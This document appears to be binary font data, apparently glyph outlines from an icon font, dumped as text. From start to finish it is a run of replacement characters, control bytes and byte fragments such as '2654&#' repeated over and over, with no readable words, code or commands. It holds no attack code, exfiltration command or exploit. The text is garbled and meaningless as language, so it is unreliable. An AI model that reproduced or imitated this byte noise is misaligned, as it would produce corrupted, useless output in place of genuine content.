� `` � �@+7%".54>322654&#"!2654&#""&1032610S�l??l�SS�l??l��


-


�HH<TT<H ?l�SS�l??l�SS�l?�







� `` � �@)6CP%1".54>32'2>54.#"32654&#"3!2654&#"3"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� `` � �@+7%2>54.#""&54632!"&54632"1063210&S�l??l�SS�l??l�=





�HH<TT<H ?l�SS�l??l�SS�l?�







� `` � �@)6CPTX%1".54>32'2>54.#"35"&1032610#'2654&#"3!2654&#"3'35!35S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�



 



@��`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �







�    � �@+7;?%".54>32"&1032610'2654&#"!2654&#"'35!35S�l??l�SS�l??l�SHH<TT<H�


-


3��`� ?l�SS�l??l�SS�l? `` �







�    � �@)6:>KX%1".54>32'2>54.#"35"&1032610#7!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` aHH�







� �@#'3?%".54>32"&10326107!7'2654&#"!2654&#"S�l??l�SS�l??l�SHH<TT<H<j�$j


-


 ?l�SS�l??l�SS�l? `` aHH�







� �@)6CPTX%1".54>32'2>54.#"32654&#"3!2654&#"3"1063210&#7!7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�HH<TT<HH�j�$j ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� `` �HH� �@+7;?%".54>322654&#"!2654&#"210&#"1067!7'S�l??l�SS�l??l��


-


�HH<TT<H�j�$j ?l�SS�l??l�SS�l?�







� `` �HH� �@!6CPY326=35!1".54>32'2>54.#"32654&#"3!2654&#"33#"&5�B..B@���S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�/!!/@P.BB.P  ��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�P!//!� �@ ,8A#5!##"&52>54.#""&54632!"&54632326=�@`@B..BpS�l??l�SS�l??l�=





�/!!/@  P.BB.�?l�SS�l??l�SS�l?�







�P!//!P� �@!6CLP326=35!1".54>32'2>54.#"32654&#"33#"&535�B..B@���S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



�/!!/`�@P.BB.P  ��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�



�P!//!0  � �@ ,59#5!##"&52>54.#""&54632326=%3#�@`@B..BpS�l??l�SS�l??l��


�/!!/���@  P.BB.�?l�SS�l??l�SS�l?�



�P!//!P� � �@)6CV%1".54>32'2>54.#"32654&#"3!2654&#"3".#"#23263"&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



P4$PGFS$4 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�0``0� �@+=%".54>322654&#"!2654&#"".#"#23263"&S�l??l�SS�l??l��


-


C4$PGFS$4 ?l�SS�l??l�SS�l?�







�0``0� �@
#*?Tan}��#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!35!35`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�Ѐ�`�@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/     
� �@
#*>JVZ^#5;2#5#5353#'#5#53'#>;#"&'132>54.#""&54632!"&54632'3#%3#`@`= @@ =�@@@@`==pS�l??l�SS�l??l�=





M����@   `   `  ` @ `�?l�SS�l??l�SS�l?�







�   � �@
#*?Tan}��#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!'#'7`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�jdj@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/!HH
� �@
#*>JVZ^#5;2#5#5353#'#5#53'#>;#"&'132>54.#""&54632!"&54632''#'7`@`= @@ =�@@@@`==pS�l??l�SS�l??l�=





jdj@   `   `  ` @ `�?l�SS�l??l�SS�l?�







�HH� �@
#*?Tan}��#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!7!7'`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�j�$j@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/!HH
� �@#/37=AEKW["32>54.7#"&'35#>;'"&54632#535#53;2##535#53#53"&546327'7S�l??l�SS�l??l���jjl== 


s@@@@�= @@@@0=


?jj@?l�SS�l??l�SS�l?��GH�� �



�   @   ` 



?GG
� �@
#*?Tan}#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/� �@
#*>JV#5;2#5#5353#'#5#53'#>;#"&'132>54.#""&54632!"&54632`@`= @@ =�@@@@`==pS�l??l�SS�l??l�=





@   `   `  ` @ `�?l�SS�l??l�SS�l?�







� �@)6CP]ae%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"335!35S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//!P��`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ �    � �@+7;?%".54>322654&#"!2654&#"2654&#"35!35S�l??l�SS�l??l��


-


�!//!!//q��`� ?l�SS�l??l�SS�l?�







��/!!//!!/�    � �@)6CP]ae%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"37!7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//!�j�$j ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ �HH� �@+7;?%".54>322654&#"!2654&#"2654&#"7!7'S�l??l�SS�l??l��


-


�!//!!//�j�$j ?l�SS�l??l�SS�l?�







��/!!//!!/�HH� �@)6CP]ae%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"3'#'7S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//!�jdj ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ �HH� �@+7;?%".54>322654&#"!2654&#"2654&#"7'S�l??l�SS�l??l��


-


�!//!!//�jj�jj ?l�SS�l??l�SS�l?�







��/!!//!!/�HH.HH� �@)6=D%1".54>32'2>54.#"35"1063210&#7'7%'7'7S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �[ZCD�Z[DC� �@&-%2>54.#"7"1063210&7'7%'7'7S�l??l�SS�l??l�SHH<TT<HZ[[DD��[[DD ?l�SS�l??l�SS�l?� `` �[ZCD�Z[DC� �@)8?F%1".54>32'2>54.#"3'"15063210&#7'7%'7'7S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]T�[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @�[ZCD�Z[DC� �@!(/%2>54.#""15063210&7'7%'7'7S�l??l�SS�l??l�RS\\ST]]O[[DD��[[DD ?l�SS�l??l�SS�l?@ @@ @�[ZCD�Z[DC� �@)-1>K^%1".54>32'2>54.#"335!352654&#"3!2654&#"3".#"#23263"&#S�l??l�SS�l??l�SL�d::d�LL�d::d�LP��`�@



 



P4$PGFS$4 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:@    �







�0``0� �@'3E%".54>3235!352654&#"!2654&#"".#"#23263"&S�l??l�SS�l??l���`�@


-


C4$PGFS$4 ?l�SS�l??l�SS�l?`    �







�0``0� �@)-1@%1".54>32'2>54.#"3737'"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH��@ @@ @� �@)%2>54.#"'7"15063210&S�l??l�SS�l??l�ijj jjeS\\ST]] ?l�SS�l??l�SS�l?AHH.HH�@ @@ @� �@)-1>%1".54>32'2>54.#"335335"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    � `` � �@'%".54>3235335"&1032610S�l??l�SS�l??l��݀���HH<TT<H ?l�SS�l??l�SS�l?    � `` � �@)-1>%1".54>32'2>54.#"3737'"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%".54>32737'"&1032610S�l??l�SS�l??l���j�j�HH<TT<H ?l�SS�l??l�SS�l?AHH�� `` � �@)-1>%1".54>32'2>54.#"37!7'"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djdHH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%".54>327!7'"&1032610S�l??l�SS�l??l�j�djdHH<TT<H ?l�SS�l??l�SS�l?AHH�� `` � �@)-1>K%1".54>32'2>54.#"3353351"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    ��/!!//!!/ � �@'%".54>32353352654&#"S�l??l�SS�l??l��݀���!//!!// ?l�SS�l??l�SS�l?    ��/!!//!!/� �@)6CGK%1".54>32'2>54.#"351"&54632'2654&#"37!7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L!//!!//!dj�dj ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�/!!//!!/ �HH� �@#'%".54>32'2654&#"7!7'S�l??l�SS�l??l�S!//!!//�j�dj ?l�SS�l??l�SS�l?�/!!//!!/�HH� �@)-1>K%1".54>32'2>54.#"3737'1"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�_/!!//!!/ � �@'%".54>32737'2654&#"S�l??l�SS�l??l���j�j�!//!!// ?l�SS�l??l�SS�l?AHH�_/!!//!!/� �@)07BI%1".54>32'2>54.#"37''!7''!0#".03261S�l??l�SS�l??l�SL�d::d�LL�d::d�LE[[DD��[[DD�3_NN^3+PvuO ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�ZZDDZZDD�<H<<H< ��� �@!,%".54>3277'!77'032>1S�l??l�SS�l??l�DD[[��DD[[3_NN^3 ?l�SS�l??l�SS�l?�DDZZDDZZ�<H<<H<� �@)8?F%1".54>32'2>54.#"3'"&10326150#7''!7''S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]TF[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @ZZDDZZDD� �@!(/%2>54.#"72610#"&1507''!7''S�l??l�SS�l??l�RT]]TS\\�[[DD��[[DD ?l�SS�l??l�SS�l?�@ @@ @ZZDDZZDD� �@)6=D%1".54>32'2>54.#"35"&1032610#?''!7''S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HHE[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �ZZDDZZDD� �@&-%2>54.#"2610#"&10?''!7''S�l??l�SS�l??l�SHH<TT<H�[[DD��[[DD ?l�SS�l??l�SS�l? `` �ZZDDZZDD� �@)-1>%1".54>32'2>54.#"3737'"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%2>54.#"'7"1063210&S�l??l�SS�l??l�ijj jjdHH<TT<H ?l�SS�l??l�SS�l?AHH.HH� `` � �@)-1>%1".54>32'2>54.#"37!7'"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djdHH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%2>54.#"'7"1063210&S�l??l�SS�l??l��jj��jj�HH<TT<H ?l�SS�l??l�SS�l?AHH.HH� `` � �@)-1>%1".54>32'2>54.#"335335"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    �� `` � �@'%2>54.#"3#%3#"1063210&S�l??l�SS�l??l�}�� ��PHH<TT<H ?l�SS�l??l�SS�l?   � `` � �@)-1@%1".54>32'2>54.#"37!7'"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djcS\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH��@ @@ @� �@)%2>54.#"'7"15063210&S�l??l�SS�l??l��jj��jj�S\\ST]] ?l�SS�l??l�SS�l?AHH.HH�@ @@ @� �@)-1@%1".54>32'2>54.#"37!7'"&10326150#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djcS\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH��@ @@ @� �@)%".54>327!7'"&10326150S�l??l�SS�l??l�j�djcS\\ST]] ?l�SS�l??l�SS�l?AHH��@ @@ @� �@-BO\'77''/77''71".54>32'2>54.#"351"&54632'2654&#"3�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�SL�d::d�LL�d::d�L!//!!//!0��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�/!!//!!/ � �@,8'77''/77''72>54.#"7"&54632�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�S!//!!//0��?l�SS�l??l�SS�l?�/!!//!!/� �@-BO\'77''/77''71".54>32'2>54.#"351"&54632'2654&#"3�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�SL�d::d�LL�d::d�L<TT<<TT<.BB..BB.0��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�/!!//!!/ � �@,877'7''77'7''".54>32'2654&#"�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�S<TT<<TT0��?l�SS�l??l�SS�l?�/!!//!!/� �@$9N[hu�65'.'..'&&'7>71".54>32'2>54.#"31"&54632'2654&#"352654&#"3!2654&#"3
1/@eH"%%"He@/1
S�l??l�SS�l??l�SL�d::d�LL�d::d�L�(88((88(%%%%



 



(/W	8

8	W/��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�8((88((8 %%%% 







� �@#7CO[g&57>7>>7667'.2>54.#""&54632'"&54632'2654&#"!"&54632
1/@eH"%%"He@/1
S�l??l�SS�l??l�=(88((88(%%%%


-


(/W	8

8	W/�?l�SS�l??l�SS�l?�8((88((8 %%%% 







� �@$9N[h65'.'..'&&'7>71".54>32'2>54.#"32654&#"3!2654&#"3
1/@eH"%%"He@/1
S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



(/W	8

8	W/��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� �@#7CO&57>7>>7667'.2>54.#""&54632!"&54632
1/@eH"%%"He@/1
S�l??l�SS�l??l�=





(/W	8

8	W/�?l�SS�l??l�SS�l?�







� �@f{�����9.*&"#.1>32#".54670110103267>1067>7103261067>10670692>54.#"3'"&10326150#1>3#"&'.'.'.7!#"&'.'.7>7212654&#"3!2654&#"3DKQQ##QQKBOZ00ZOB:d�LL�d:
	
!0 !++! 0!
	
��S�l??l�SS�l??l�SS\\ST]]T��C4

*



*

4C�n



 



z
		
&=++=&*$Q+L�d::d�L+Q$$%	
&%%&
	%$��?l�SS�l??l�SS�l?�@ @@ @V	*			$

$			*	V







� �@G[i����1623>1010#"&'.10&'.'10#"&10&'.10&'&67>:2>54.#"72610#"&150>3#"&'.'.'.7!#"&'.'.7>722654&#"!2654&#"'YWO
	
!0 !++! 0!
	
OWY'S�l??l�SS�l??l�RT]]TS\\�C4

*



*

4C�n


-


i

'$%	
&%%&
	%$'

��?l�SS�l??l�SS�l?�@ @@ @V	*			$

$			*	V







� �@dy�1.*&"#.1>32#".54670110103267>1067>7103261067>10670692>54.#"3'"&10326150#DKQQ##QQKBOZ00ZOB:d�LL�d:
	
!0 !++! 0!
	
��S�l??l�SS�l??l�SS\\ST]]Tz
		
&=++=&*$Q+L�d::d�L+Q$$%	
&%%&
	%$��?l�SS�l??l�SS�l?�@ @@ @� �@FZh623>1010#"&'.10&'.'10#"&10&'.10&'&67>:2>54.#"72610#"&150'YWO
	
!0 !++! 0!
	
OWY'S�l??l�SS�l??l�RT]]TS\\i

'$%	
&%%&
	%$'

��?l�SS�l??l�SS�l?�@ @@ @� �@f{�9.*&"#.1>32#".54670110103267>1067>7103261067>10670692>54.#"3'326=30+5DKQQ##QQKBOZ00ZOB:d�LL�d:
	
!0 !++! 0!
	
��S�l??l�SS�l??l�S_ (�z
		
&=++=&*$Q+L�d::d�L+Q$$%	
&%%&
	%$��?l�SS�l??l�SS�l?�( � �@G[j1623>1010#"&'.10&'.'10#"&10&'.10&'&67>:2>54.#"7326=30+5'YWO
	
!0 !++! 0!
	
OWY'S�l??l�SS�l??l�4_ (�i

'$%	
&%%&
	%$'

��?l�SS�l??l�SS�l?�( ���.b54&#".#"4&#".#".32>5"&'.765463234632354632354632#�/!)
/!!/
!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�!/		!//!�/!,/"G^vH1D*+Jc8�YHOtS2V5jPp��0�2WA&� d`=#81"&'.76546323>714632354632354632d&AX1[s*/N3
p2 2WA&YHOtS2V5�PL��0L0�� �`.b4&#".#".#"54&#".32>5"&'.764632354632354632354632#�/!!/
)
/!!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW20�!//!`		�!//!�,/"G^vH1D*+Jc8�YHOtS2V5J��P00���2WA&�@`@654&#"#4&#".32>54&#"#54&#"#` 0n
1L/
 j?2WA&  0P0��4V
3RuO"1<&AW2��0���-a4&#"54&#"4&#".#".32>5"&'.7646323463234632354632#�/!

/!

/!!/
!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�!/ !/	!//!/!�,/"G^vH1D*+Jc8�YGOuR3
V5J��p�������2WA&� _`654632354632#81"&'.764632346323 &AW2Zt*/L1
m0  xx�����2WA&YHOtS2T4G��p��`��1<J�#"3!2654&'2654&'>54&'>54&+>.#"93#"&54632654&#"3132+32+32+32#!0<5261>7>3209`�%%p!/!/		/!�
811!&j���

@



��pPpPp0�P$6,"$* %�`%/!
/!	(	(!/<}fA3KW#H  � 
�
�`



�   ��� *$RF.6Ys> ` �`1<J%!2654&+532654&+532654&+532654&+>.#"1##3#"&54632654&#"31@�0pPpPp�	+&"&v���&% 



    B~c=.FR$G/� %`%�`



@��1<J�#"&5463!22+#".'.9'3#"32#"&5463132654&+532654&+532654&+532654&#!02132>&'0&9@�%%p!/!/		/!�
811!&j���

@



��pPpPp0�P$6,"$*`%�%/!
/!	(	(!/<}fA3KW#H  �
�`
�



�`   ��� *$RF.6Ys> ` �`1<J!2+32+32+32+#".'.1##3#"32#"&54631@�0pPpPp�	+&"&v���&% 



`   B~c=.FR$G/�%��%�



@��3n%32654&'2654&'1>54&'>54&+>.#"1#";3067>32132+32+32+32+'#"&5463h�!/	!/		/!�
811!&j�%%��h��v&"&+	�pPpPp0�

/!
/!	(	(!/<}fA3KW#H %��%@/G$RF.<cB   @
`
` �`:32+32+32+32+'#"&546;067>32��pPpPp0�

�v&"&+	   @
`
/G$RF.<cB@��3n3221+#".'.1#"&546;73032>&'132654&+532654&+532654&+532654&+#"3h�!/	!/		/!�
811!&j�%%��h��v&"&+	�pPpPp0�

�/!
/!	(	(!/<}fA3KW#H %`%@�/G$RF.<cB   @
��
` �`;32654&+532654&+532654&+532654&+#";032>&'1��pPpPp0�

�v&"&+	�   @
��
/G$RF.<cB>����6j.32>=4&#"14&#"54&#".#"#7'7'3"&'.76463234632354632354632#`/b":R'AHL%8cJ+/!
/!
/!(	,�h��h�Zt*/N2
p1   &AW2��,/"G^vH1D*+Jc8�!/	!/	�!/	$h��h� YHOtS2V5j��p��0P�2WA&��`:>3234632354632354632#"&'.76#'7�   &AX1[s*/N3
p2�h��h���p��PpP�2WA&YHOtS2V5:h��h�����7k37'#54&#".#".32>=4&#"14&#"5"&'.76463234632354632354632#��h��h�/!(	!//b":R'AHL%8cJ+/!
/!
Zt*/N2
p1   &AW2�h��h!/	/!��,/"G^vH1D*+Jc8�!/	!/	�� YHOtS2V5j��p��0P�2WA&��`;354632354632#"&'.76463234632!'7'7@  &AX1[s*/N3
p2 h��h��PpP�2WA&YGOuR3
V5J��p0h��h���>m%:32>=4&#"#54&#"#4&#"#4&#".'7'%#".'.7614632>32>321>32`2WA&   1p
2N/$_Eh��h +Jc8%LHA'R:#b//!	(!/
!/
!/ &AW2�P0P��P��5V3RuN>Th��h���8cJ+*D1Hv^G"/,!/	/!�	/!	/!� ``;%.'.764632346323546323546327'7`Sm(/N3
p2   #=Q/h��h XCOuR3
V5J��p��PpP�0TA'!h��h�����8g%7'74&#"#4&#".32>=4&#"#54&#"%#".'.7614632>32>321>32�h��h 1p
2N/*tZ2WA& +Jc8%LHA'R:#b//!	(!/
!/
!/�h��hr��P��5V3RuNHY&AW2�P��R8cJ+*D1Hv^G"/,!/	/!�	/!	/!� ``954632354632#"&'.76463234632'7'� &AX1[s*/N3
p2 h��h�`pP�2WA&YGOuR3
V5J��p��h��h���.b54&#"14&#"54&#".#".32>5"&'.76463234632354632354632#�/!

/!

/!(	!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�".!/	�!/	/!��,/"G^vH1D*+Jc8�YGOuR3
V5j��p��0P�2WA&� @`24&#"#4&#".32>54&#"#54&#"#@ 2p
3N/*s[1XA&  0��0��5V3RuNHY&AW2PpP�����(S��.#".#"1.54632>3254&'1>54&#".#"1.54>3:>3254&#"14&#"54&#".#".32>51"&'.76463234632354632354632#)-
)T<1<T!#gI5Ig#+5!8L+9+L8!5+�/!

/!

/!(	!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2?)Z.<TT<.Z)�G)IggI)G']7+L8!!8L+7]���".!/	�!/	/!��,/"G^vH1D*+Jc8�YGOuR3
V5j��p��0P�2WA&��`� Cv>54&#".#"5463214632>54&#"*#".5467>32'4&#"#4&#".32>54&#"#54&#"#�B.#7

/A/!

/!!/#U;&?<T#+5bFG)Ig6*  2p
3N/*s[1XA&  �(.B%B.(N!/!//!x>&<T#T<%?%T3Gf#gI3T���0��5V3RuNHY&AW2PpP ����	Bw3#5377'7#53#554&#"14&#"54&#".#".32>5"&'.76463234632354632354632#1��g� �4�g� ��/!
/!
/!(	!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�� �k�� �k���!/	!/	�!/	/!��,/"G^vH1D*+Jc8�YHOtS2V5j��p��0P�2WA&@����	F73#53'7#53#54&#"#4&#".32>54&#"#54&#"#`��g� @��g� @ 1p
2N/*tZ2WA&  U�� �k�� �k{��0��5V2StOHY&AW2PpP$����Bx3#53'7#53#554&#"54&#"54&#".#".32>51"&'.76463234632354632354632#9��g� ��h� ��."

."

.")	
!//b":R'BGL%9cJ*��Zs+/M3
p1   %AX2�� �l��� �k��ʿ!/!/	�!/	/"��,/"G^wG1D+*Jc9�YGOuR3
V5j��p��/O�2WB%D����F3#53'7#53#5%4&#"#4&#".32>54&#"#54&#"#��g� ��h� �� 1p
3M/*tZ2WB%  �� �l��� �k����/��5V
3RuOGY&AW2PpPP ����+Z�.54>321'70"1'7.#"701#'754&#"14&#"54&#".#".32>5"&'.76463234632354632354632#�!8L+Sq!ODIgEN!qSW."

."

."(	
!//b":R'BGL%8dI+��Zt*/N2
p1   &AW22+L8!Sq!NEgIDO!qS���".!/	�!/	/!��,/"G^vH1D*+Id8�YGOuR3
V5j��p��0P�2WA&@����+^.54>321'70"1'7.#"701#'7%4&#"#4&#".32>54&#"#54&#"#�!8L+Sq!ODIgEN!qS7 1p
2N/*tZ2WA&  2+L8!Sq!NEgIDO!qS���0��5V
3RuOGY&AW2PpP~����7n#'73>32>32>321>32#".'.7612>50=4&#"#54&#"#54&#"#4&#".3��h��h�,!/
)!/
!/+Jc8%LHA'R:"b/2WA&   1p
2N/*tZ�h��h$/!�	/!	/!�8cJ+*D1Hv^G"/,� (BW/88�P0PpP��5V2StOHY��`:>32354632354632354632#"&'.76#'7�   &AX1[s*/N3
p2�h��h��АpPpP�2WA&YHOtS2V5:h��h�����6n3'7'7#>32>321>32#".'.7646322>50=4&#"#54&#"#54&#"#4&#".31��g��g�
)!/
!/+Jc8%LHA'R:#b//!,r2WA&   2p
2N/*tZh��h�	/!	/!�8cJ+*D1Hv^G"/,!/%�(BW/77�P0PpP��5V3RuNHY�``;354632354632354632#"&'.764632!'7'7#�   &AX1[s*/N3
p2h��h����pPpP�2WA&YGOuR3
V5Jh��h��`>m%>50=4&#"#54&#"#54&#"#4&#".'7'%#".'.7614632>32>321>32�/R<#   1p
2N/(mSh��h+Jc8%LHA'R:#b//!!/
)!/
!/!*AT-77�P0PpP��5V3RuNDX"h��h���8cJ+*D1Hv^G"/,!//!�		/!.!�@`@;%.'.7646323546323546323546327'7`Sm(/N3
p2   #=Q/h��h@XCOuR3
V5J�АpPpP�0TA'!h��h����`.h54&#"14&#".#"54&#".32>54632354632#"&'.764632354632'7'1�/!

/!)

/!!//b":R'AHL%8cJ+� &AW2Zt*/N2
p1 h��h�".!/	�!//!��,/"G^vH1D*+Jc8P�/WB(YGOuR3
V5j��p��h��hR�@`@954632354632#"&'.764632354632'7'� &AX1[s*/N3
p2 h��hPpP�2WA&YGOuR3
V5J�А�nh��h"��`7g%2>50=4&#"#54&#"#54&#"#4&#".31%#".'.7614632>32>321>32p2WA&   1p
2N/*tZ+Jc8%LHA'R:"b//!!/
)!/
!/ (BW/88�P0PpP��5V2StOHY�8cJ+*D1Hv^G"/,!//!�	/!	/!��@`@24&#"#4&#".32>54&#"#54&#"#` 2p
3N/*s[1XA&  p�0��5V3RuNHY&AW2PpP�����!5l�>54.#"5.546321'>54&#"546322>50=4&#"#54&#"#54&#"#4&#".3%#".'.7614632>32>321>32Z!8L++L8!5+#gIIg	:T<<TB..BP2WA&   1p
2N/*tZ+Jc8%LHA'R:"b//!!/
)!/
!/X="+L8!!8L+7]'G)IggI 9.<TT<.[/AA/�(BW/88�P0PpP��5V2StOHY�8cJ+*D1Hv^G"/,!//!�	/!	/!��`�"7j>54&#"5.54632:329'>54&#"546324&#"#4&#".32>54&#"#54&#"#J
gIIg5+#T<;U

JB./A/!!/` 2p
3N/*s[1XA&  |+IggI3T%?%<TT<)(.BB.(N!//!NR�0��5V3RuNHY&AW2PpP�����Kz>54&#"546322>50=4&#"#54&#"#54&#"#4&#".31%#".'.7614632>32>321>32 T<<TB..BP2WA&   2p
2N/*tZ+Jc8%LHA'R:#b//!!/
)!/
!/�.<TT<.Z/AA/�(BW/77�P0PpP��5V3RuNHY�8cJ+*D1Hv^G"/,!//!�		/!.!� ``F>54&#"546324&#"#4&#".32>54&#"#54&#"#B..B/!!/` 1p
2N/*tZ2WA&  �(.BB.(N!//!��0��5V2StOHY&AW2PpP�����Az�35#5#"&5467".'.764632>32>32>32#952>50=4&#"#54&#"#54&#"#4&#".392654&#"31�H@)7B..B7)p%LHA'R:#b//!!/
)!/
!/+Jc82WA&   2p
2N/*tZ�<TT<<TT< _?*.BB.*?��*D1Hv^G"/,!//!�		/!.!�8cJ+ (BW/77�P0PpP��5V3RuNHY�T<<TT<<T���`�%2e35#5#"&5467>54&#"546322654&#"34&#"#4&#".32>54&#"#54&#"#�H@(8B./A7)�B./A/!!/�;UU;<TT<� 2p
3N/*s[1XA&   _?*.BB.*?�(.BB.(N!//!0T<<TT<<Tp�0��5V3RuNHY&AW2PpP`����-d�.#".'.5463257>54&#"546322>50=4&#"#54&#"#54&#"#4&#".3%#".'.7614632>32>321>32`:"<T<.
B."6�T<<TB..BP2WA&   1p
2N/*tZ+Jc8%LHA'R:"b//!!/
)!/
!/KT<2L
3.B$3J.<TT<.[/AA/�(BW/88�P0PpP��5V2StOHY�8cJ+*D1Hv^G"/,!//!�	/!	/!�� �`1d<54&#".'.5463297>54&#"546324&#"#4&#".32>54&#"#54&#"#�K55KF2%8(#5		�B..B/!!/` 1p
2N/*tZ2WA&  �5KK53J
	
1 (8-"�(.BB.(N!//!��0��5V2StOHY&AW2PpP�����	
O3570&'!7'77'2>50=4&#"#54&#"#54&#"#4&#".31%#".'.7614632>32>321>32� �dd@}}�}}%cd�2WA&   2p
2N/*tZ+Jc8%LHA'R:#b//!!/
)!/
!/���RQQ��QQ��(BW/77�P0PpP��5V3RuNHY�8cJ+*D1Hv^G"/,!//!�		/!."����`�	
I3570&'!7'77'4&#"#4&#".32>54&#"#54&#"#� �dd@}}�}},cd� 1p
2N/*tZ2WA&  ���RQQ��QQ���0��5V3RuNHY&AW2PpP.��5i.32>=4&#"4&#".#".#"#7'7'"&'.7646323463234632354632#`/b":R'AHL%8cJ+/!

/!)(	!/�h��hZt*/N2
p1   &AW2��,/"G^vH1D*+Jc8�".!/		/!h��h�@YGOuR3
V5j��p��0���2WA&��`;3.32>54&#"#4&#"#4&#"#4&#"1#7'7��2p
3N/*s[1XA&   �h�����5V2StOHY&AW2P0��P��0h��M��6j54&#".#".#".32>=4&#"537'#"&'.7646323463234632354632#�/!)(	!//b":R'AHL%8cJ+/!

�h��h�Zt*/N2
p1   &AW2!/		/!��,/"G^vH1D*+Jc8�".�h��h� YGOuR3
